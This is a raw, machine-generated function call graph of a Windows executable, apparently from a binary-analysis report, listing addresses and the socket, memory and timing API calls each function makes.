7ff7f8d17dbf 28727->28728 28737 7ff7f8d17db4 28727->28737 28810 7ff7f8d23bb8 GetTickCount64 28728->28810 28730 7ff7f8d17dc8 28731 7ff7f8d173c8 9 API calls 28730->28731 28733 7ff7f8d17ddf 28731->28733 28732 7ff7f8d48290 _cwprintf_s_l 8 API calls 28734 7ff7f8d18153 28732->28734 28735 7ff7f8d17de8 28733->28735 28758 7ff7f8d17e01 28733->28758 28734->28704 28845 7ff7f8d167ac 23 API calls 2 library calls 28735->28845 28737->28732 28738 7ff7f8d18990 19 API calls 28738->28758 28739 7ff7f8d1800e 28739->28737 28742 7ff7f8d18032 28739->28742 28847 7ff7f8d17934 141 API calls 28739->28847 28741 7ff7f8d178b4 SleepEx getsockopt WSAGetLastError 28741->28758 28742->28737 28849 7ff7f8d12c90 34 API calls __swprintf_l 28742->28849 28744 7ff7f8d17f66 WSASetLastError 28744->28758 28745 7ff7f8d18056 28750 7ff7f8d18097 28745->28750 28751 7ff7f8d1875c closesocket 28745->28751 28746 7ff7f8d18126 28850 7ff7f8d167ac 23 API calls 2 library calls 28746->28850 28747 7ff7f8d16714 19 API calls 28747->28758 28749 7ff7f8d17934 141 API calls 28749->28758 28811 7ff7f8d1d388 28750->28811 28751->28750 28755 7ff7f8d180d4 28821 7ff7f8d17b90 28755->28821 28756 7ff7f8d28674 GetTickCount64 28756->28755 28758->28738 28758->28739 28758->28741 28758->28744 28758->28745 28758->28747 28758->28749 28846 7ff7f8d12c90 34 API calls __swprintf_l 28758->28846 28867 7ff7f8d20374 28761->28867 28763 7ff7f8d20fff 28764 7ff7f8d21029 28763->28764 28766 7ff7f8d20e8c 150 API calls 28763->28766 28767 7ff7f8d21039 28763->28767 28765 7ff7f8d1c3a4 125 API calls 28764->28765 28764->28767 28765->28767 28766->28764 28767->28697 28769 7ff7f8d143ed 28768->28769 28979 7ff7f8d2b250 28769->28979 28771 7ff7f8d14480 28771->28685 28773 7ff7f8d28674 GetTickCount64 28773->28771 28774 7ff7f8d1441b 28774->28771 28774->28773 28776->28699 28777->28699 28778->28699 28779->28693 28780->28690 28781->28694 28782->28694 28783->28713 28784->28722 28786 7ff7f8d28674 GetTickCount64 28785->28786 28787 7ff7f8d20eb7 28786->28787 28790 7ff7f8d20ef5 free 28787->28790 28796 7ff7f8d20f19 28787->28796 28802 7ff7f8d14adf 28787->28802 28789 7ff7f8d20f40 28791 7ff7f8d20f6e 28789->28791 28792 7ff7f8d20f55 28789->28792 29286 7ff7f8d0f954 18 API calls __swprintf_l 28790->29286 28795 7ff7f8d28674 GetTickCount64 28791->28795 29288 7ff7f8d18568 28792->29288 28798 7ff7f8d20f7b 28795->28798 28796->28802 29287 7ff7f8d23bb8 GetTickCount64 28796->29287 28797 7ff7f8d20f68 28797->28802 29303 7ff7f8d23bb8 GetTickCount64 28797->29303 28799 7ff7f8d28674 GetTickCount64 28798->28799 28800 7ff7f8d20f88 28799->28800 28803 7ff7f8d17b90 51 API calls 28800->28803 28802->28725 28802->28726 28804 7ff7f8d20fa2 28803->28804 29302 7ff7f8d1d48c 19 API calls 28804->29302 28806->28672 28807->28688 28808->28720 28809->28648 28810->28730 28812 7ff7f8d180aa 28811->28812 28814 7ff7f8d1d3a2 28811->28814 28812->28737 28812->28755 28812->28756 28813 7ff7f8d1d46d 28853 7ff7f8d301e0 123 API calls _cwprintf_s_l 28813->28853 28814->28813 28815 7ff7f8d1d448 28814->28815 28817 7ff7f8d1d42d 28814->28817 28852 7ff7f8d30684 152 API calls _cwprintf_s_l 28815->28852 28817->28815 28819 7ff7f8d1d432 28817->28819 28851 7ff7f8d167ac 23 API calls 2 library calls 28819->28851 28822 7ff7f8d17bc7 28821->28822 28823 7ff7f8d17c2b 28821->28823 28822->28823 28826 7ff7f8d17be1 getpeername 28822->28826 28824 7ff7f8d48290 _cwprintf_s_l 8 API calls 28823->28824 28825 7ff7f8d17d55 28824->28825 28848 7ff7f8d1d48c 19 API calls 28825->28848 28827 7ff7f8d17c30 __scrt_fastfail 28826->28827 28828 7ff7f8d17c04 WSAGetLastError 28826->28828 28831 7ff7f8d17c43 getsockname 28827->28831 28854 7ff7f8d12c90 34 API calls __swprintf_l 28828->28854 28830 7ff7f8d17c16 28855 7ff7f8d167ac 23 API calls 2 library calls 28830->28855 28832 7ff7f8d17c5a WSAGetLastError 28831->28832 28833 7ff7f8d17c75 28831->28833 28856 7ff7f8d12c90 34 API calls __swprintf_l 28832->28856 28857 7ff7f8d17b0c 28833->28857 28838 7ff7f8d17c97 _errno _errno 28864 7ff7f8d12c90 34 API calls __swprintf_l 28838->28864 28839 7ff7f8d17cc1 28840 7ff7f8d17b0c 3 API calls 28839->28840 28842 7ff7f8d17d0f 28840->28842 28842->28823 28843 7ff7f8d17d13 _errno _errno 28842->28843 28865 7ff7f8d12c90 34 API calls __swprintf_l 28843->28865 28845->28737 28846->28758 28847->28742 28848->28737 28849->28746 28850->28737 28851->28812 28852->28812 28853->28812 28854->28830 28855->28823 28856->28830 28858 7ff7f8d17b30 28857->28858 28859 7ff7f8d17b69 _errno 28858->28859 28866 7ff7f8d2e500 _errno 28858->28866 28861 7ff7f8d17b7d 28859->28861 28861->28838 28861->28839 28862 7ff7f8d17b51 28862->28859 28863 7ff7f8d17b56 htons 28862->28863 28863->28861 28864->28830 28865->28823 28866->28862 28868 7ff7f8d203c8 28867->28868 28869 7ff7f8d20408 28868->28869 28870 7ff7f8d203fd free 28868->28870 28958 7ff7f8d1d644 8 API calls _cwprintf_s_l 28869->28958 28873 7ff7f8d2050a free 28870->28873 28875 7ff7f8d2051f free 28873->28875 28874 7ff7f8d20410 28876 7ff7f8d2044f free 28874->28876 28887 7ff7f8d204df 28874->28887 28875->28763 28877 7ff7f8d20476 malloc 28876->28877 28878 7ff7f8d20488 malloc 28877->28878 28877->28887 28880 7ff7f8d204b8 free 28878->28880 28882 7ff7f8d2053b 28878->28882 28880->28887 28882->28887 28959 7ff7f8d1da24 61 API calls 2 library calls 28882->28959 28884 7ff7f8d205e2 28884->28887 28889 7ff7f8d20679 strchr 28884->28889 28960 7ff7f8d0f954 18 API calls __swprintf_l 28884->28960 28886 7ff7f8d20613 28886->28887 28890 7ff7f8d20647 28886->28890 28891 7ff7f8d20634 tolower 28886->28891 28887->28870 28889->28887 28961 7ff7f8d1ec2c 66 API calls 28889->28961 28890->28889 28892 7ff7f8d20661 free 28890->28892 28891->28890 28891->28891 28892->28889 28893 7ff7f8d206ed 28893->28887 28962 7ff7f8d1f48c 28 API calls 3 library calls 28893->28962 28895 7ff7f8d20722 28895->28887 28963 7ff7f8d1f76c 32 API calls 28895->28963 28897 7ff7f8d20749 28897->28870 28897->28887 28964 7ff7f8d1fbf4 30 API calls 2 library calls 28897->28964 28899 7ff7f8d2078e _cwprintf_s_l 28899->28870 28900 7ff7f8d1e2dc 2 API calls 28899->28900 28901 7ff7f8d20858 __scrt_fastfail 28900->28901 28901->28870 28901->28901 28902 7ff7f8d20912 28901->28902 28906 7ff7f8d209af 28901->28906 28903 7ff7f8d2099f 28902->28903 28965 7ff7f8d24abc 21 API calls _cwprintf_s_l 28902->28965 28968 7ff7f8d21070 GetTickCount64 _cwprintf_s_l 28903->28968 28906->28887 28969 7ff7f8d1c9c0 GetTickCount64 _cwprintf_s_l 28906->28969 28907 7ff7f8d20948 28966 7ff7f8d1e220 19 API calls _cwprintf_s_l 28907->28966 28910 7ff7f8d20b5c 28912 7ff7f8d20ca1 28910->28912 28970 7ff7f8d1ca68 125 API calls _cwprintf_s_l 28910->28970 28911 7ff7f8d20950 28911->28887 28967 7ff7f8d269d4 GetTickCount64 _cwprintf_s_l 28911->28967 28920 7ff7f8d20ce0 28912->28920 28972 7ff7f8d249e8 17 API calls _cwprintf_s_l 28912->28972 28916 7ff7f8d20c07 28916->28912 28917 7ff7f8d20c0f 28916->28917 28971 7ff7f8d1ffb0 25 API calls 28917->28971 28919 7ff7f8d20e50 28922 7ff7f8d16714 19 API calls 28919->28922 28926 7ff7f8d20d25 28920->28926 28973 7ff7f8d1c848 GetTickCount64 _cwprintf_s_l 28920->28973 28921 7ff7f8d20c1f free 28936 7ff7f8d20c49 28921->28936 28925 7ff7f8d20e5f 28922->28925 28923 7ff7f8d20d73 28923->28919 28924 7ff7f8d20d8e 28923->28924 28975 7ff7f8d24abc 21 API calls _cwprintf_s_l 28924->28975 28931 7ff7f8d1bf2c 116 API calls 28925->28931 28926->28919 28926->28923 28974 7ff7f8d1c764 GetTickCount64 _cwprintf_s_l 28926->28974 28927 7ff7f8d20b8e 28927->28912 28927->28916 28933 7ff7f8d16714 19 API calls 28927->28933 28931->28887 28938 7ff7f8d20bd4 28933->28938 28934 7ff7f8d20d13 28939 7ff7f8d20d18 28934->28939 28940 7ff7f8d20d27 28934->28940 28935 7ff7f8d20d9d 28942 7ff7f8d20dbe 28935->28942 28950 7ff7f8d16714 19 API calls 28935->28950 28947 7ff7f8d16714 19 API calls 28936->28947 28937 7ff7f8d20d61 28943 7ff7f8d20d66 28937->28943 28944 7ff7f8d20d75 28937->28944 28938->28916 28952 7ff7f8d16714 19 API calls 28938->28952 28945 7ff7f8d1c3a4 125 API calls 28939->28945 28941 7ff7f8d16714 19 API calls 28940->28941 28941->28926 28946 7ff7f8d20c9c 28942->28946 28953 7ff7f8d16714 19 API calls 28942->28953 28948 7ff7f8d1c3a4 125 API calls 28943->28948 28949 7ff7f8d16714 19 API calls 28944->28949 28945->28926 28976 7ff7f8d21070 GetTickCount64 _cwprintf_s_l 28946->28976 28947->28946 28948->28923 28949->28923 28950->28942 28952->28916 28953->28946 28954 7ff7f8d20e0a 28977 7ff7f8d1e220 19 API calls _cwprintf_s_l 28954->28977 28956 7ff7f8d20e12 28956->28870 28978 7ff7f8d1fe54 102 API calls 28956->28978 28958->28874 28959->28884 28960->28886 28961->28893 28962->28895 28963->28897 28964->28899 28965->28907 28966->28911 28967->28903 28968->28887 28969->28910 28970->28927 28971->28921 28972->28920 28973->28934 28974->28937 28975->28935 28976->28954 28977->28956 28978->28887 28980 7ff7f8d2b317 28979->28980 29159 7ff7f8d2b320 28979->29159 28983 7ff7f8d2b357 free 28980->28983 28984 7ff7f8d2b370 28980->28984 28980->29159 28981 7ff7f8d48290 _cwprintf_s_l 8 API calls 28982 7ff7f8d143f5 28981->28982 28982->28771 28982->28774 29165 7ff7f8d142e0 353 API calls 28982->29165 28983->28984 28985 7ff7f8d2b480 28984->28985 28987 7ff7f8d2b470 free 28984->28987 28984->29159 29166 7ff7f8d29ea8 28985->29166 28987->28985 28989 7ff7f8d2b4e0 free 28990 7ff7f8d2b4fc 28989->28990 28991 7ff7f8d2b51f 28989->28991 28990->28991 29223 7ff7f8d0f954 18 API calls __swprintf_l 28990->29223 28993 7ff7f8d2b5c5 free 28991->28993 28994 7ff7f8d2b581 free 28991->28994 28991->29159 28996 7ff7f8d2b5b4 28993->28996 29224 7ff7f8d0f954 18 API calls __swprintf_l 28994->29224 28999 7ff7f8d2b5f9 28996->28999 29003 7ff7f8d2b61a 28996->29003 28996->29159 29225 7ff7f8d2aa64 isspace strchr 28999->29225 29001 7ff7f8d2b60f free 29007 7ff7f8d2b6f2 _cwprintf_s_l 29001->29007 29003->29001 29004 7ff7f8d2b667 29003->29004 29226 7ff7f8d167ac 23 API calls 2 library calls 29004->29226 29006 7ff7f8d2b964 29008 7ff7f8d2b99c 29006->29008 29009 7ff7f8d2b9dd 29006->29009 29007->29006 29012 7ff7f8d2b73d free 29007->29012 29016 7ff7f8d2b754 _cwprintf_s_l strchr 29007->29016 29007->29159 29228 7ff7f8d0f954 18 API calls __swprintf_l 29008->29228 29229 7ff7f8d0f954 18 API calls __swprintf_l 29009->29229 29014 7ff7f8d2b7af strcmp 29012->29014 29014->29006 29015 7ff7f8d2b7c6 29014->29015 29227 7ff7f8d0f954 18 API calls __swprintf_l 29015->29227 29020 7ff7f8d2b79f free 29016->29020 29017 7ff7f8d2bb2a 29019 7ff7f8d2bb5c 29017->29019 29045 7ff7f8d2bb91 29017->29045 29230 7ff7f8d114d4 48 API calls _cwprintf_s_l 29019->29230 29020->29014 29022 7ff7f8d2bb89 29022->29045 29022->29159 29023 7ff7f8d0f868 __swprintf_l 17 API calls 29023->29017 29024 7ff7f8d2b9db 29024->29017 29024->29023 29025 7ff7f8d2bce9 29027 7ff7f8d2bd45 29025->29027 29028 7ff7f8d2bd19 free 29025->29028 29030 7ff7f8d2be29 29025->29030 29026 7ff7f8d2bd7e calloc 29031 7ff7f8d2bdaa calloc 29026->29031 29027->29026 29027->29159 29234 7ff7f8d0f954 18 API calls __swprintf_l 29028->29234 29029 7ff7f8d2bc98 29029->29025 29035 7ff7f8d2bcb9 29029->29035 29030->29027 29036 7ff7f8d2be5f free 29030->29036 29033 7ff7f8d2bdc0 29031->29033 29031->29159 29032 7ff7f8d2b7d5 29032->29017 29032->29024 29032->29032 29044 7ff7f8d2b874 malloc 29032->29044 29032->29159 29172 7ff7f8d2a8ac 29033->29172 29232 7ff7f8d167ac 23 API calls 2 library calls 29035->29232 29040 7ff7f8d2be71 29036->29040 29041 7ff7f8d2be85 29036->29041 29236 7ff7f8d0f954 18 API calls __swprintf_l 29040->29236 29041->29040 29043 7ff7f8d2be98 29041->29043 29235 7ff7f8d0f954 18 API calls __swprintf_l 29043->29235 29058 7ff7f8d2b89d _cwprintf_s_l 29044->29058 29044->29159 29045->29025 29045->29029 29050 7ff7f8d2bc29 29045->29050 29051 7ff7f8d2bc42 29045->29051 29047 7ff7f8d2bdfe 29054 7ff7f8d2a8ac 26 API calls 29047->29054 29048 7ff7f8d2bedc 29055 7ff7f8d2a948 5 API calls 29048->29055 29231 7ff7f8d167ac 23 API calls 2 library calls 29050->29231 29051->29029 29056 7ff7f8d2bcd2 29051->29056 29061 7ff7f8d2be24 29054->29061 29055->29061 29233 7ff7f8d167ac 23 API calls 2 library calls 29056->29233 29059 7ff7f8d2b93d 29058->29059 29060 7ff7f8d2b926 free 29058->29060 29059->29024 29060->29059 29062 7ff7f8d2a8ac 26 API calls 29061->29062 29061->29159 29063 7ff7f8d2c05c free 29062->29063 29065 7ff7f8d2c091 free 29063->29065 29066 7ff7f8d2c0ac 29065->29066 29065->29159 29067 7ff7f8d2c28d 29066->29067 29068 7ff7f8d2c107 29066->29068 29073 7ff7f8d2c20f 29066->29073 29066->29159 29067->29159 29183 7ff7f8d2b0e0 29067->29183 29237 7ff7f8d227d0 28 API calls _cwprintf_s_l 29068->29237 29069 7ff7f8d2c265 29069->29067 29078 7ff7f8d2a948 5 API calls 29069->29078 29069->29159 29072 7ff7f8d2c234 29077 7ff7f8d2a8ac 26 API calls 29072->29077 29072->29159 29073->29069 29073->29072 29075 7ff7f8d2a8ac 26 API calls 29073->29075 29075->29072 29077->29069 29078->29067 29080 7ff7f8d2c300 29082 7ff7f8d2c309 29080->29082 29098 7ff7f8d2c3ff 29080->29098 29081 7ff7f8d2c545 29083 7ff7f8d2c6ef 29081->29083 29107 7ff7f8d2c55f 29081->29107 29202 7ff7f8d2a948 29082->29202 29086 7ff7f8d2a8ac 26 API calls 29083->29086 29084 7ff7f8d2c14f 29084->29073 29087 7ff7f8d2c1d3 29084->29087 29089 7ff7f8d2a8ac 26 API calls 29084->29089 29085 7ff7f8d2c75b 29095 7ff7f8d2a8ac 26 API calls 29085->29095 29097 7ff7f8d2c7b8 29085->29097 29090 7ff7f8d2c6fe 29086->29090 29091 7ff7f8d2c204 29087->29091 29238 7ff7f8d2127c 8 API calls 29087->29238 29089->29084 29103 7ff7f8d2a6d8 56 API calls 29090->29103 29090->29159 29091->29073 29092 7ff7f8d2c317 29092->29159 29213 7ff7f8d2a6d8 29092->29213 29093 7ff7f8d2c44f 29100 7ff7f8d2c46a 29093->29100 29093->29159 29241 7ff7f8d2adcc 27 API calls 29093->29241 29094 7ff7f8d2c5c5 29094->29159 29244 7ff7f8d2adcc 27 API calls 29094->29244 29095->29097 29096 7ff7f8d2c7e3 29112 7ff7f8d2c81d 29096->29112 29113 7ff7f8d2c7ff 29096->29113 29096->29159 29097->29096 29102 7ff7f8d2a8ac 26 API calls 29097->29102 29097->29159 29098->29093 29108 7ff7f8d2a8ac 26 API calls 29098->29108 29105 7ff7f8d2a948 5 API calls 29100->29105 29100->29159 29102->29096 29109 7ff7f8d2c720 29103->29109 29122 7ff7f8d2c483 29105->29122 29107->29094 29111 7ff7f8d2a8ac 26 API calls 29107->29111 29108->29093 29249 7ff7f8d269d4 GetTickCount64 _cwprintf_s_l 29109->29249 29111->29094 29131 7ff7f8d2c815 29112->29131 29251 7ff7f8d2adcc 27 API calls 29112->29251 29250 7ff7f8d2aa64 isspace strchr 29113->29250 29114 7ff7f8d2c6c9 29248 7ff7f8d167ac 23 API calls 2 library calls 29114->29248 29115 7ff7f8d2c34b 29239 7ff7f8d269d4 GetTickCount64 _cwprintf_s_l 29115->29239 29116 7ff7f8d2c33f 29242 7ff7f8d167ac 23 API calls 2 library calls 29116->29242 29120 7ff7f8d2c5db 29120->29114 29126 7ff7f8d2a948 5 API calls 29120->29126 29120->29159 29127 7ff7f8d2a6d8 56 API calls 29122->29127 29122->29159 29123 7ff7f8d2c397 29123->29159 29240 7ff7f8d2896c GetTickCount64 _cwprintf_s_l 29123->29240 29128 7ff7f8d2c60e 29126->29128 29129 7ff7f8d2c4c8 29127->29129 29134 7ff7f8d2a948 5 API calls 29128->29134 29128->29159 29129->29116 29132 7ff7f8d2c4ec 29129->29132 29137 7ff7f8d2a948 5 API calls 29131->29137 29157 7ff7f8d2c8b0 29131->29157 29131->29159 29243 7ff7f8d269d4 GetTickCount64 _cwprintf_s_l 29132->29243 29133 7ff7f8d2c3ab 29135 7ff7f8d289f8 25 API calls 29133->29135 29141 7ff7f8d2c629 29134->29141 29138 7ff7f8d2c3b3 29135->29138 29139 7ff7f8d2c88d 29137->29139 29142 7ff7f8d16714 19 API calls 29138->29142 29138->29159 29145 7ff7f8d2c89e 29139->29145 29146 7ff7f8d2c8b5 29139->29146 29139->29159 29140 7ff7f8d2a948 realloc free free free malloc 29140->29157 29144 7ff7f8d2a6d8 56 API calls 29141->29144 29141->29159 29142->29159 29143 7ff7f8d2a6d8 56 API calls 29143->29157 29147 7ff7f8d2c672 29144->29147 29148 7ff7f8d2a948 5 API calls 29145->29148 29149 7ff7f8d2c8f4 29146->29149 29152 7ff7f8d2a8ac 26 API calls 29146->29152 29150 7ff7f8d2c678 29147->29150 29151 7ff7f8d2c68d 29147->29151 29148->29157 29153 7ff7f8d2a948 5 API calls 29149->29153 29149->29157 29245 7ff7f8d167ac 23 API calls 2 library calls 29150->29245 29246 7ff7f8d269d4 GetTickCount64 _cwprintf_s_l 29151->29246 29156 7ff7f8d2c8cc 29152->29156 29153->29157 29156->29157 29161 7ff7f8d2a948 5 API calls 29156->29161 29157->29140 29157->29143 29157->29159 29158 7ff7f8d2c687 29158->29114 29160 7ff7f8d2c6bc 29158->29160 29159->28981 29247 7ff7f8d111a4 free free 29160->29247 29163 7ff7f8d2c8e2 29161->29163 29163->29149 29164 7ff7f8d2a948 5 API calls 29163->29164 29164->29149 29165->28774 29167 7ff7f8d29ee5 29166->29167 29170 7ff7f8d29f45 29167->29170 29171 7ff7f8d29f3f _cwprintf_s_l 29167->29171 29252 7ff7f8d29d14 93 API calls 29167->29252 29170->28989 29170->29159 29171->29170 29253 7ff7f8d29d14 93 API calls 29171->29253 29254 7ff7f8d0f9fc 29172->29254 29175 7ff7f8d2a8dc 29178 7ff7f8d2a948 5 API calls 29175->29178 29176 7ff7f8d2a910 free 29180 7ff7f8d2a935 free 29176->29180 29179 7ff7f8d2a8f5 free 29178->29179 29181 7ff7f8d2a93f 29179->29181 29180->29181 29181->29047 29181->29048 29181->29159 29184 7ff7f8d2b11a 29183->29184 29191 7ff7f8d2b113 29183->29191 29259 7ff7f8d12264 _gmtime64 29184->29259 29186 7ff7f8d2b12b 29188 7ff7f8d2b131 29186->29188 29192 7ff7f8d2b147 29186->29192 29187 7ff7f8d48290 _cwprintf_s_l 8 API calls 29189 7ff7f8d2b238 29187->29189 29260 7ff7f8d167ac 23 API calls 2 library calls 29188->29260 29189->29159 29196 7ff7f8d2ae90 29189->29196 29191->29187 29192->29191 29193 7ff7f8d0f868 __swprintf_l 17 API calls 29192->29193 29194 7ff7f8d2b202 29193->29194 29195 7ff7f8d2a948 5 API calls 29194->29195 29195->29191 29200 7ff7f8d2aec3 strchr 29196->29200 29197 7ff7f8d2b0bc 29197->29080 29197->29081 29197->29085 29197->29159 29198 7ff7f8d2af6f isspace 29198->29200 29199 7ff7f8d2b068 isspace 29199->29200 29200->29197 29200->29198 29200->29199 29201 7ff7f8d2a8ac 26 API calls 29200->29201 29201->29200 29203 7ff7f8d2a979 free 29202->29203 29205 7ff7f8d2a9b1 29202->29205 29206 7ff7f8d2a992 29203->29206 29207 7ff7f8d2aa29 _cwprintf_s_l 29205->29207 29208 7ff7f8d2a9fe 29205->29208 29209 7ff7f8d2aa0b malloc 29205->29209 29206->29207 29211 7ff7f8d2a9a2 free 29206->29211 29207->29092 29261 7ff7f8d24800 realloc free 29208->29261 29209->29206 29211->29207 29214 7ff7f8d2a72f _cwprintf_s_l 29213->29214 29262 7ff7f8d16960 29214->29262 29217 7ff7f8d2a7e9 29219 7ff7f8d2a801 29217->29219 29268 7ff7f8d2a68c free 29217->29268 29219->29115 29219->29116 29221 7ff7f8d2a7cb 29221->29217 29267 7ff7f8d171ac 19 API calls 2 library calls 29221->29267 29223->28991 29224->28996 29225->29001 29226->29159 29227->29032 29228->29024 29229->29024 29230->29022 29231->29159 29232->29159 29233->29159 29234->29027 29235->29027 29236->29027 29237->29084 29239->29123 29240->29133 29241->29100 29242->29123 29243->29123 29244->29120 29245->29158 29246->29158 29247->29159 29248->29159 29249->29085 29250->29131 29251->29131 29252->29171 29253->29170 29255 7ff7f8d0ed58 __swprintf_l 17 API calls 29254->29255 29256 7ff7f8d0fa30 29255->29256 29257 7ff7f8d0fa82 free 29256->29257 29258 7ff7f8d0fa3a 29256->29258 29257->29258 29258->29175 29258->29176 29259->29186 29260->29191 29261->29206 29263 7ff7f8d1699f 29262->29263 29269 7ff7f8d16a00 29263->29269 29266 7ff7f8d171ac 19 API calls 2 library calls 29266->29221 29267->29217 29270 7ff7f8d16a59 29269->29270 29271 7ff7f8d16b00 send 29269->29271 29270->29271 29276 7ff7f8d18990 19 API calls 29270->29276 29272 7ff7f8d169b6 29271->29272 29273 7ff7f8d16b23 WSAGetLastError 29271->29273 29272->29217 29272->29266 29273->29272 29274 7ff7f8d16b3c 29273->29274 29284 7ff7f8d12c90 34 API calls __swprintf_l 29274->29284 29278 7ff7f8d16a8e 29276->29278 29277 7ff7f8d16b46 29285 7ff7f8d167ac 23 API calls 2 library calls 29277->29285 29278->29271 29280 7ff7f8d16a96 29278->29280 29281 7ff7f8d16adf recv 29280->29281 29283 7ff7f8d16abe malloc 29280->29283 29281->29271 29282 7ff7f8d16ad9 29281->29282 29282->29271 29283->29281 29283->29282 29284->29277 29285->29272 29286->28796 29287->28789 29304 7ff7f8d23bb8 GetTickCount64 29288->29304 29290 7ff7f8d185a1 29291 7ff7f8d173c8 9 API calls 29290->29291 29292 7ff7f8d185c3 29291->29292 29293 7ff7f8d185cb 29292->29293 29294 7ff7f8d185e3 29292->29294 29305 7ff7f8d167ac 23 API calls 2 library calls 29293->29305 29296 7ff7f8d16208 20 API calls 29294->29296 29301 7ff7f8d1862d 29296->29301 29297 7ff7f8d48290 _cwprintf_s_l 8 API calls 29298 7ff7f8d1869f 29297->29298 29298->28797 29299 7ff7f8d185da 29299->29297 29301->29299 29306 7ff7f8d18220 29301->29306 29302->28797 29303->28802 29304->29290 29305->29299 29356 7ff7f8d187d4 29306->29356 29309 7ff7f8d17b0c 3 API calls 29311 7ff7f8d18293 29309->29311 29310 7ff7f8d48290 _cwprintf_s_l 8 API calls 29312 7ff7f8d1854a 29310->29312 29313 7ff7f8d1829c _errno _errno 29311->29313 29314 7ff7f8d182d1 29311->29314 29312->29301 29362 7ff7f8d12c90 34 API calls __swprintf_l 29313->29362 29316 7ff7f8d16714 19 API calls 29314->29316 29318 7ff7f8d182e4 29316->29318 29317 7ff7f8d182b7 29363 7ff7f8d167ac 23 API calls 2 library calls 29317->29363 29320 7ff7f8d18309 setsockopt 29318->29320 29332 7ff7f8d1835b 29318->29332 29321 7ff7f8d18337 WSAGetLastError 29320->29321 29322 7ff7f8d1835d 29320->29322 29364 7ff7f8d12c90 34 API calls __swprintf_l 29321->29364 29326 7ff7f8d16714 19 API calls 29322->29326 29323 7ff7f8d1875c closesocket 29346 7ff7f8d183d9 29323->29346 29326->29332 29327 7ff7f8d18347 29330 7ff7f8d16714 19 API calls 29327->29330 29329 7ff7f8d183c0 29333 7ff7f8d183f4 29329->29333 29334 7ff7f8d18422 ioctlsocket 29329->29334 29330->29332 29365 7ff7f8d18170 29332->29365 29382 7ff7f8d17500 118 API calls 2 library calls 29333->29382 29383 7ff7f8d23bb8 GetTickCount64 29334->29383 29336 7ff7f8d183ff 29336->29334 29339 7ff7f8d18405 29336->29339 29337 7ff7f8d18394 29337->29329 29342 7ff7f8d182cc 29337->29342 29341 7ff7f8d1875c closesocket 29339->29341 29340 7ff7f8d18447 29343 7ff7f8d18472 29340->29343 29345 7ff7f8d16208 20 API calls 29340->29345 29344 7ff7f8d18410 29341->29344 29342->29323 29343->29346 29347 7ff7f8d184ad WSAGetLastError 29343->29347 29348 7ff7f8d18492 connect 29343->29348 29344->29346 29345->29343 29346->29310 29350 7ff7f8d184bc 29347->29350 29348->29347 29348->29350 29350->29346 29384 7ff7f8d12c90 34 API calls __swprintf_l 29350->29384 29352 7ff7f8d184eb 29353 7ff7f8d16714 19 API calls 29352->29353 29354 7ff7f8d18501 29353->29354 29355 7ff7f8d1875c closesocket 29354->29355 29355->29346 29357 7ff7f8d18822 _cwprintf_s_l 29356->29357 29358 7ff7f8d1886d socket 29357->29358 29359 7ff7f8d18854 29357->29359 29358->29359 29360 7ff7f8d48290 _cwprintf_s_l 8 API calls 29359->29360 29361 7ff7f8d18276 29360->29361 29361->29309 29361->29346 29362->29317 29363->29342 29364->29327 29366 7ff7f8d18198 29365->29366 29372 7ff7f8d181a6 29365->29372 29367 7ff7f8d2df38 14 API calls 29366->29367 29367->29372 29368 7ff7f8d181c6 getsockopt 29369 7ff7f8d181f7 setsockopt 29368->29369 29370 7ff7f8d181ed 29368->29370 29371 7ff7f8d181aa 29369->29371 29370->29369 29370->29371 29371->29337 29373 7ff7f8d172b4 setsockopt 29371->29373 29372->29368 29372->29371 29374 7ff7f8d17307 29373->29374 29375 7ff7f8d1731e WSAIoctl 29373->29375 29376 7ff7f8d16714 19 API calls 29374->29376 29377 7ff7f8d17319 29375->29377 29378 7ff7f8d17391 WSAGetLastError 29375->29378 29376->29377 29380 7ff7f8d48290 _cwprintf_s_l 8 API calls 29377->29380 29379 7ff7f8d16714 19 API calls 29378->29379 29379->29377 29381 7ff7f8d173b9 29380->29381 29381->29337 29382->29336 29383->29340 29384->29352 29475 7ff7f8d0b91c calloc 29476 7ff7f8d01b50 _errno _errno 29478 7ff7f8d44720 21 API calls strchr 29479 7ff7f8d32320 free free free 28147 7ff7f8d07e38 36 API calls __scrt_fastfail 29492 7ff7f8d1450a 19 API calls 29496 7ff7f8d4a710 _seh_filter_exe 29510 7ff7f8d3a2c0 140 API calls _cwprintf_s_l 29512 7ff7f8d368c0 465 API calls _cwprintf_s_l 29513 7ff7f8d498c0 RtlUnwindEx _IsNonwritableInCurrentImage __except_validate_context_record 29514 7ff7f8d128c5 strncpy _errno _errno GetLastError SetLastError 29516 7ff7f8d1bec8 free 29518 7ff7f8d2cd96 47 API calls _cwprintf_s_l 29519 7ff7f8d382d0 442 API calls 29520 7ff7f8d3acd0 32 API calls 29523 7ff7f8d2e2d0 19 API calls 3 library calls 27347 7ff7f8d0fc9b 27355 7ff7f8d140b4 27347->27355 27351 7ff7f8d0fd41 27352 7ff7f8d0fcca 27352->27351 27353 7ff7f8d0fd39 Sleep 27352->27353 27354 7ff7f8d0fd2c WSASetLastError 27352->27354 27353->27351 27354->27351 27356 7ff7f8d14103 27355->27356 27363 7ff7f8d140fb 27355->27363 27360 7ff7f8d1411a 27356->27360 27401 7ff7f8d15fac 9 API calls _cwprintf_s_l 27356->27401 27362 7ff7f8d14199 malloc 27360->27362 27368 7ff7f8d141ca 27360->27368 27361 7ff7f8d14289 27361->27363 27367 7ff7f8d142a4 free 27361->27367 27365 7ff7f8d141bc 27362->27365 27366 7ff7f8d141c5 27362->27366 27392 7ff7f8d48290 27363->27392 27365->27363 27366->27368 27367->27363 27368->27361 27371 7ff7f8d18d48 27368->27371 27370 7ff7f8d23bb8 GetTickCount64 27370->27352 27372 7ff7f8d18d97 27371->27372 27373 7ff7f8d18dae 27371->27373 27372->27373 27377 7ff7f8d18dcf 27372->27377 27374 7ff7f8d19065 27373->27374 27375 7ff7f8d18dbc WSASetLastError 27373->27375 27376 7ff7f8d190ff Sleep 27373->27376 27378 7ff7f8d48290 _cwprintf_s_l 8 API calls 27374->27378 27375->27374 27376->27374 27382 7ff7f8d18de0 27377->27382 27402 7ff7f8d23bb8 GetTickCount64 27377->27402 27379 7ff7f8d19118 27378->27379 27379->27361 27381 7ff7f8d18f3c 27381->27374 27381->27376 27384 7ff7f8d18f4a WSASetLastError 27381->27384 27382->27381 27386 7ff7f8d18f5d 27382->27386 27383 7ff7f8d18fa0 select 27385 7ff7f8d18fe2 WSAGetLastError 27383->27385 27391 7ff7f8d1905f 27383->27391 27384->27374 27385->27386 27386->27374 27386->27383 27386->27391 27403 7ff7f8d23bb8 GetTickCount64 